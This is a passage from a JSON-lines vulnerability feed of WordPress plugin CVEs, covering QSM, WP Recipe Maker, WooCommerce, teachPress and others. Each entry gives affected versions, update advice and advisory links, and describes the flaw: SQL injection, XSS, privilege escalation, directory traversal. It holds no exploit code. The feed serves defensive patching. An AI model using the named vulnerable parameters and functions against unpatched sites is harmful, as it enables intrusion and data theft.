134-8f3f-b411e56457f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5433","slug":"message-ticker","versionImpact":"9.2","versionEndExcluding":"9.3","description":"The Message ticker plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 9.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/message-ticker\\\/trunk\\\/message-ticker.php?rev=2827131#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/message-ticker\\\/trunk\\\/message-ticker.php?rev=2827131#L142\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0b1fa88-2fc6-41af-bd39-12af92dc6533?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0b1fa88-2fc6-41af-bd39-12af92dc6533?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985499\\\/message-ticker#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985499\\\/message-ticker#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10679","slug":"quiz-master-next","versionImpact":"9.2.0","versionEndExcluding":"9.2.1","description":"The Quiz and Survey Master (QSM)  WordPress plugin before 9.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 9.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/001391eb-f181-441d-b777-d9ce098ba143\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/001391eb-f181-441d-b777-d9ce098ba143\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3058","slug":"xelion-webchat","versionImpact":"9.1.0","versionEndExcluding":"9.2.0","description":"The Xelion Webchat plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the xwc_save_settings() function in all versions up to, and including, 9.1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 9.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xelion-webchat\\\/trunk\\\/\\\/includes\\\/class-xelion-webchat-ajax-admin.php#L119\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xelion-webchat\\\/trunk\\\/\\\/includes\\\/class-xelion-webchat-ajax-admin.php#L119\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/250202d5-3a0d-494c-8386-1f4cd015ad7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/250202d5-3a0d-494c-8386-1f4cd015ad7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5466","slug":"wp-anything-slider","versionImpact":"9.1","versionEndExcluding":"9.2","description":"The Wp anything slider plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 9.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/535e754e-f851-4809-a148-d9ba808b9d8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/535e754e-f851-4809-a148-d9ba808b9d8a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-anything-slider\\\/trunk\\\/wp-anything-slider.php?rev=2827063#L122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-anything-slider\\\/trunk\\\/wp-anything-slider.php?rev=2827063#L122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-anything-slider\\\/trunk\\\/wp-anything-slider.php?rev=2827063#L136\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-anything-slider\\\/trunk\\\/wp-anything-slider.php?rev=2827063#L136\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985513\\\/wp-anything-slider#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985513\\\/wp-anything-slider#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4712","slug":"wp-cerber","versionImpact":"9.1","versionEndExcluding":"9.2","description":"The WP Cerber Security plugin for WordPress is vulnerable to stored cross-site scripting via the log parameter when logging in to the site in versions up to, and including, 9.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd9cbba-10b0-4fb0-ad49-4593a307a615?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd9cbba-10b0-4fb0-ad49-4593a307a615?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cerber\\\/trunk\\\/admin\\\/cerber-dashboard.php?rev=2721561#L1338\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-cerber\\\/trunk\\\/admin\\\/cerber-dashboard.php?rev=2721561#L1338\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13814","slug":"global-gallery","versionImpact":"9.1.5","versionEndExcluding":"9.1.6","description":"The Global Gallery - WordPress Responsive Gallery plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 9.1.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","recommendation":"Update to version 9.1.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/global-gallery-wordpress-responsive-gallery\\\/3310108\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/global-gallery-wordpress-responsive-gallery\\\/3310108\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lcweb.it\\\/global-gallery-wordpress-photogallery-plugin\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/lcweb.it\\\/global-gallery-wordpress-photogallery-plugin\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b5ba815-ce92-4d7b-aa80-29d6fddd7f63?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b5ba815-ce92-4d7b-aa80-29d6fddd7f63?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8758","slug":"quiz-master-next","versionImpact":"9.1.2","versionEndExcluding":"9.1.3","description":"The Quiz and Survey Master (QSM) WordPress plugin before 9.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 9.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d74ecae2-3a1e-4fc7-9dd3-04cef631ecd9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d74ecae2-3a1e-4fc7-9dd3-04cef631ecd9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0383","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [wprm-recipe-instructions] and [wprm-recipe-ingredients] shortcodes in all versions up to, and including, 9.1.0 due to insufficient restrictions on the 'group_tag' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/104b3c01-4623-43cb-aed4-16e3be62e1f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/104b3c01-4623-43cb-aed4-16e3be62e1f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-instructions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-instructions.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-ingredients.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-ingredients.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0381","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the use of the 'tag' attribute in the wprm-recipe-name, wprm-recipe-date, and wprm-recipe-counter shortcodes in all versions up to, and including, 9.1.0. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7c949f0-fcd1-4984-95a2-b19fb72f04bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-name.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-name.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-counter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-counter.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-date.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/recipe\\\/class-wprm-sc-date.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6970","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018Referer' header in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20842e95-4b91-4138-9e32-7c090724bf64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20842e95-4b91-4138-9e32-7c090724bf64?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/templates\\\/public\\\/print.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/templates\\\/public\\\/print.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6958","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec201702-8c8c-4049-b647-422d18001b7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec201702-8c8c-4049-b647-422d18001b7f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/general\\\/class-wprm-sc-text.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/general\\\/class-wprm-sc-text.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0384","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Recipe Notes in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/749c5d09-1e9a-4aa1-b7c2-6f9d24f3a09b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3019769%40wp-recipe-maker&new=3019769%40wp-recipe-maker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0382","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to unrestricted use of the 'header_tag' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/class-wprm-shortcode-helper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/shortcodes\\\/class-wprm-shortcode-helper.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0380","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 9.1.0 via the 'icon' attribute used in Shortcodes. This makes it possible for authenticated attackers, with contributor-level access and above, to include the contents of SVG files on the server, which can be leveraged for Cross-Site Scripting.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/457c4e56-c2a0-451f-a4a6-e7fb7bf7b0e0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0255","slug":"wp-recipe-maker","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprm-recipe-text-share' shortcode in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019769\\\/wp-recipe-maker\\\/trunk\\\/includes\\\/public\\\/class-wprm-icon.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6879","slug":"quiz-master-next","versionImpact":"9.1.0","versionEndExcluding":"9.1.1","description":"The Quiz and Survey Master (QSM) WordPress plugin before 9.1.1 fails to validate and escape certain Quiz fields before displaying them on a page or post where the Quiz is embedded, which could allow contributor and above roles to perform Stored Cross-Site Scripting (XSS) attacks.","recommendation":"Update to version 9.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4da0b318-03e7-409d-9b02-f108e4232c87\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4da0b318-03e7-409d-9b02-f108e4232c87\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9944","slug":"woocommerce","versionImpact":"9.0.2","versionEndExcluding":"9.1.0","description":"The WooCommerce plugin for WordPress is vulnerable to HTML Injection in all versions up to, and including, 9.0.2. This is due to the plugin not properly neutralizing HTML elements from submitted order forms. This makes it possible for unauthenticated attackers to inject arbitrary HTML that will render when the administrator views order form submissions.","recommendation":"Update to version 9.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5dfe2a5-612f-4e6c-a639-4afcff2ffa4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5dfe2a5-612f-4e6c-a639-4afcff2ffa4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/pull\\\/49370\",\"name\":\"https:\\\/\\\/github.com\\\/woocommerce\\\/woocommerce\\\/pull\\\/49370\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/woocommerce\\\/woocommerce\\\/trunk\\\/changelog.txt\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/woocommerce\\\/woocommerce\\\/trunk\\\/changelog.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3115837%40woocommerce%2Ftrunk&old=3106873%40woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3115837%40woocommerce%2Ftrunk&old=3106873%40woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6390","slug":"quiz-master-next","versionImpact":"9.0.5","versionEndExcluding":"9.1.0","description":"The Quiz and Survey Master (QSM) WordPress plugin before 9.1.0 does not properly sanitise and escape some of its Quiz settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 9.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00586687-33c7-4d84-b606-0478b1063d24\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00586687-33c7-4d84-b606-0478b1063d24\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5663","slug":"news-announcement-scroll","versionImpact":"9.0.0","versionEndExcluding":"9.1.0","description":"The News Announcement Scroll plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 9.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with contributor-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b29113d6-7a9a-4e10-a446-147ec146ac93?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b29113d6-7a9a-4e10-a446-147ec146ac93?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/news-announcement-scroll\\\/tags\\\/9.0.0\\\/news-announcement-scroll.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/news-announcement-scroll\\\/tags\\\/9.0.0\\\/news-announcement-scroll.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987837\\\/news-announcement-scroll#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987837\\\/news-announcement-scroll#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5428","slug":"image-vertical-reel-scroll-slideshow","versionImpact":"9.0","versionEndExcluding":"9.1","description":"The Image vertical reel scroll slideshow plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 9.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01d31d8a-4459-488a-9cbe-92761faa58b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01d31d8a-4459-488a-9cbe-92761faa58b4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-vertical-reel-scroll-slideshow\\\/trunk\\\/image-vertical-reel-scroll-slideshow.php?rev=2827122#L273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-vertical-reel-scroll-slideshow\\\/trunk\\\/image-vertical-reel-scroll-slideshow.php?rev=2827122#L273\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985333\\\/image-vertical-reel-scroll-slideshow#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985333\\\/image-vertical-reel-scroll-slideshow#file1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1321","slug":"teachpress","versionImpact":"9.0.7","versionEndExcluding":"9.0.8","description":"The teachPress plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the 'tpsearch' shortcode in all versions up to, and including, 9.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 9.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3246754%40teachpress&new=3246754%40teachpress&sfp_email=&sfph_mail=#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3246754%40teachpress&new=3246754%40teachpress&sfp_email=&sfph_mail=#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb453fe3-ba89-437c-b3fb-9ec207eaa9f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb453fe3-ba89-437c-b3fb-9ec207eaa9f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6025","slug":"quiz-master-next","versionImpact":"9.0.4","versionEndExcluding":"9.0.5","description":"The Quiz and Survey Master (QSM) WordPress plugin before 9.0.5 does not sanitise and escape some of its Quiz settings, which could allow contributors and higher to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 9.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15abc7dd-95b1-4dad-ba25-eb65105d3925\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15abc7dd-95b1-4dad-ba25-eb65105d3925\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
